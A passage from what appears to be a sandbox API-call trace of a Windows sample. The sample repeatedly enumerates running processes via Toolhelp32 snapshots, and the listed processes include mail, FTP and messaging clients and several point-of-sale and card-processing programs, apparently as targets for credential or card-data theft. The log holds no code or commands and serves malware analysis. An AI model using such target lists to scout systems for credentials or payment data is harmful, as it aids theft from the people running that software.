lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0219.567] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0219.571] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0219.574] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0219.577] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0219.586] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0219.589] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0219.593] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0219.596] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0219.598] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0219.602] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0219.605] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0219.608] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0219.611] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0219.613] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0219.616] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0219.620] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0219.622] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0219.625] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0219.628] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0219.630] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0219.632] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0219.634] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0219.638] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0219.640] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0219.643] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0219.646] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0219.649] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0219.650] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0219.652] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0219.654] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0219.656] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0219.661] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.663] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.665] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0219.667] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.669] Process32Next (in: hSnapshot=0x21bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0219.671] CloseHandle (hObject=0x21bc) returned 1 [0219.671] Sleep (dwMilliseconds=0x64) [0219.793] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21c8 [0219.805] Process32First (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.806] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.808] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.810] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.812] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.813] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.815] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.817] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.818] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.823] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.824] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.826] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.828] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.830] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.903] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.906] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.908] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.910] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.913] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.915] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.917] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0219.920] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.922] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0219.925] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.927] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0219.929] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0219.931] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0219.934] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0219.936] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.938] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0219.980] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.983] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.985] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0219.988] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.990] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.992] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.995] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.998] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0220.000] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0220.002] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0220.004] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0220.007] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0220.009] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0220.012] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0220.014] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0220.029] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0220.032] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0220.034] Process32Next (in: hSnapshot=0x21c8, 